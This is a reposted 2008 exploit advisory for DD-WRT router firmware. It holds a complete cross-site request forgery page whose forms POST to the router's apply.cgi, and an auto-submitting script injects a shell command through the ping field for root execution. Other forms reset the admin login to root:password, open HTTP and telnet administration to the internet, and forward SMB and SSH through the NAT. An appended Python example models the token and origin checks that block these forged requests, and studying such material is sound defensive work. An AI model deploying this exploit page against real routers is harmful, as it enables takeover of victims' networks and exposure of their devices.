
DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit

2008/12/7 Author: unknown Source: Internet

Remote root dd-wrt
--------------------------------------------------------------------------------

Written by Michael Brooks
Special thanks to str0ke

Exploits tested on the newest stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:
http://dd-wrt.com/

Impact:
1) Remote root command execution via /bin/sh
2) Change the web administration password and enable remote administration
3) Create new port forwarding rules to bypass NAT.

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<!-- Form 1: Diagnostics page ping. The ping_ip value reaches /bin/sh on the
     router, so any command placed there runs as root. This form is submitted
     automatically by the script at the bottom of the page. -->
Remote root command execution via /bin/sh
<form method="post" action="http://192.168.1.1/apply.cgi" id="1">
<input name="submit_button" value="Ping" type="hidden">
<input name="action" value="ApplyTake" type="hidden">
<input name="submit_type" value="start" type="hidden">
<input name="change_action" value="gozila_cgi" type="hidden">
<input name="next_page" value="Diagnostics.asp" type="hidden">
<input name="ping_ip" value="echo owned">
<input name="execute command" type="submit">
</form><br><br>
<!-- Form 2: Management page. Sets the web login to root:password and turns on
     remote (WAN-side) HTTP administration on port 8080 and telnet on port 23. -->
Enable remote administration and change the login to root:password
<form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Management" type="hidden">
<input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden">
<input name="commit" value="1" type="hidden">
<input name="PasswdModify" value="0" type="hidden">
<input name="remote_mgt_https" value="" type="hidden">
<input name="http_enable" value="1" type="hidden">
<input name="info_passwd" value="0" type="hidden">
<input name="https_enable" value="" type="hidden">
<input name="http_username" value="root" type="hidden">
<input name="http_passwd" value="password" type="hidden">
<input name="http_passwdConfirm" value="password" type="hidden">
<input name="_http_enable" value="1" type="hidden">
<input name="refresh_time" value="3" type="hidden">
<input name="status_auth" value="1" type="hidden">
<input name="maskmac" value="1" type="hidden">
<input name="remote_management" value="1" type="hidden">
<input name="http_wanport" value="8080" type="hidden">
<input name="remote_mgt_telnet" value="1" type="hidden">
<input name="telnet_wanport" value="23" type="hidden">
<input name="boot_wait" value="on" type="hidden">
<input name="cron_enable" value="1" type="hidden">
<input name="cron_jobs" value="" type="hidden">
<input name="loopback_enable" value="1" type="hidden">
<input name="nas_enable" value="1" type="hidden">
<input name="resetbutton_enable" value="1" type="hidden">
<input name="zebra_enable" value="1" type="hidden">
<input name="ip_conntrack_max" value="512" type="hidden">
<input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
<input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
<input name="overclocking" value="200" type="hidden">
<input name="router_style" value="yellow" type="hidden">
<input name="Remote Admin" type="submit">
</form><br><br>
<!-- Form 3: Port forwarding. Exposes two LAN hosts (SMB on 192.168.1.100 via
     WAN port 4450, SSH on 192.168.1.101 via WAN port 22) through the NAT. -->
Add port forwarding rules to bypass NAT protection
<form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Change Port Forwarding" type="submit">
<input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden">
<input name="forward_spec" value="13" type="hidden">
<input name="name0" value="Hacked" type="hidden">
<input name="from0" value="4450" type="hidden">
<input name="pro0" value="both" type="hidden">
<input name="ip0" value="192.168.1.100" type="hidden">
<input name="to0" value="445" type="hidden">
<input name="enable0" value="on" type="hidden">
<input name="name1" value="Hacked Again" type="hidden">
<input name="from1" value="22" type="hidden">
<input name="pro1" value="tcp" type="hidden">
<input name="ip1" value="192.168.1.101" type="hidden">
<input name="to1" value="22" type="hidden">
<input name="enable1" value="on" type="hidden">
</form>
<script>
// Auto-submit form 1 as soon as the page loads: remote root command execution!
// The victim's browser attaches its cached router credentials to the POST.
document.getElementById(1).submit();
</script>
</html>
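The three forms above work because apply.cgi accepts any POST that arrives with the admin's cached credentials; nothing in the request proves it was produced by a page the router itself served. The following is an added example, written for this page and not part of the original advisory or of DD-WRT's code, modelling the two checks such an endpoint needs and running them over the exact field sets the exploit's forms submit. Everything it assumes is hypothetical: the router origin http://192.168.1.1 (taken from the exploit), a hidden field named csrf_token carrying a per-session secret, and a Referer (or Origin) header on the POST. The origin check is defence in depth only: browsers of the 2008 era sent no Origin header and Referer can be suppressed, so the token is the real control. Note that it stops the cross-site forgery, not the fact that the Diagnostics page hands ping_ip to a shell.

```python
"""
Added example, not part of the original advisory and not DD-WRT's code:
a minimal model of the server-side checks that apply.cgi lacked, run
against the three forged POSTs the exploit page's forms produce.

Hypothetical assumptions: the router's web UI lives at http://192.168.1.1,
a legitimate page embeds a per-session token in a hidden field named
"csrf_token", and the browser sends a Referer (or Origin) header with the
POST. All request data below is constructed for the demo.
"""
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

ROUTER_ORIGIN = "http://192.168.1.1"
# apply.cgi treats action=ApplyTake as "commit these settings now".
STATE_CHANGING_ACTIONS = {"ApplyTake"}


class Session:
    """One authenticated admin session with its own unguessable CSRF token."""

    def __init__(self) -> None:
        self.csrf_token = secrets.token_hex(16)


def same_origin(url: str) -> bool:
    """True only if url is the router's own origin (exact or a path under it)."""
    return url == ROUTER_ORIGIN or url.startswith(ROUTER_ORIGIN + "/")


def check_request(session: Session, headers: dict, body: str) -> tuple:
    """Decide whether a POST to apply.cgi may be applied.

    Returns (accepted, reason). Header names are matched case-insensitively.
    """
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("action") not in STATE_CHANGING_ACTIONS:
        return True, "not a state-changing request"

    hdrs = {k.lower(): v for k, v in headers.items()}
    # Defence in depth: a form on another site cannot control Origin/Referer.
    source = hdrs.get("origin") or hdrs.get("referer")
    if not source or not same_origin(source):
        return False, "cross-site origin"

    # The real control: a token the attacker's page can neither read nor guess.
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token, session.csrf_token):
        return False, "missing or wrong csrf_token"
    return True, "ok"


# The three forms from the exploit page, as the browser would encode them.
PING_FORM = {
    "submit_button": "Ping", "action": "ApplyTake", "submit_type": "start",
    "change_action": "gozila_cgi", "next_page": "Diagnostics.asp",
    "ping_ip": "echo owned",
}
MANAGEMENT_FORM = {
    "submit_button": "Management", "action": "ApplyTake", "commit": "1",
    "http_username": "root", "http_passwd": "password",
    "http_passwdConfirm": "password", "remote_management": "1",
    "http_wanport": "8080", "remote_mgt_telnet": "1", "telnet_wanport": "23",
}
FORWARD_FORM = {
    "action": "ApplyTake", "forward_spec": "13",
    "name0": "Hacked", "from0": "4450", "pro0": "both",
    "ip0": "192.168.1.100", "to0": "445", "enable0": "on",
}


def run_demo() -> dict:
    """Submit forged and legitimate requests; return {name: (accepted, reason)}."""
    session = Session()
    attacker_headers = {"Referer": "http://attacker.example/dd-wrt.html"}  # constructed
    router_headers = {"Referer": ROUTER_ORIGIN + "/Diagnostics.asp"}
    results = {}
    for name, form in (("ping", PING_FORM), ("management", MANAGEMENT_FORM),
                       ("forward", FORWARD_FORM)):
        # As served from the attacker's page: foreign Referer, no token.
        results["forged_" + name] = check_request(session, attacker_headers, urlencode(form))
    # A same-origin request that still lacks the token is refused too.
    results["no_token"] = check_request(session, router_headers, urlencode(PING_FORM))
    # A guessed token is refused.
    results["guessed_token"] = check_request(
        session, router_headers, urlencode({**PING_FORM, "csrf_token": "0" * 32}))
    # The admin's own Diagnostics page carries the session token.
    legit = {**PING_FORM, "csrf_token": session.csrf_token}
    results["legitimate"] = check_request(session, router_headers, urlencode(legit))
    return results


if __name__ == "__main__":
    for name, (ok, why) in run_demo().items():
        print(f"{name:18} {'ACCEPT' if ok else 'REJECT'}  {why}")
```

Running the block rejects all three forged submissions at the origin check, rejects a same-origin POST that carries no token or a guessed one, and accepts only the request that carries the session's own token. The `hmac.compare_digest` call keeps the token comparison constant-time; a plain `==` would leak timing, which matters little on a LAN router but costs nothing to get right.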